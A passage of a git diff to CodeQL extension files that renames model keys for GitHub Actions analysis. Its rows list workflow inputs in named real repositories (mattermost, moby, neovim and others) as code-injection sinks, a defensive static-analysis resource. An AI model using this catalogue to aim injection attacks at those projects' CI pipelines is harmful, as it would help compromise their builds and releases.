b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec..3c8f11dd0cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 6d6f9e17740..b7c00fff318 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262f..5a129691bc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b..bd07156d06b 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec22..b029e341710 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a9..995e692e494 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0a..db325a06baa 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255..2c91ab62b0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728..8fdf39a0bbc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a9..00fceb9c7bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bf..a6b947dfbce 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57..9359ea482c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9..023666e67ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb..7005b7dd7c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3a..8b73f89401a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c9..3cf43b814db 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd1..d33e308c7eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9..5c1de93f08a 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec76..aab9fa502cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c1..b58fff831e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf13..f96264fbf42 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a9..6aaf6aa2783 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e..d246f4ce644 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141..a35a1a628e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b5..ec22645570f 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c..e0eccb26a54 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e15..5f85bb1a91a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f63..7f1af324260 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a..b06b390e718 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce8..d5746b566cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a278..fbe9e286d2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d310079..6ba2fc75375 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a..6d522b776dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c36..c210f350439 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b62..81eeb82033c 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d..6d81f2ff242 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cff..b7ea7250825 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c04336..972b6f15baa 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c6..07f0c5c0f69 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e..6bbf33e7f89 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ff..165965dd568 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a..3d1e182458e 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index e3694a38973..689cc91871a 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index f6f33154581..0481c04cb67 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,7 +1,7 @@ 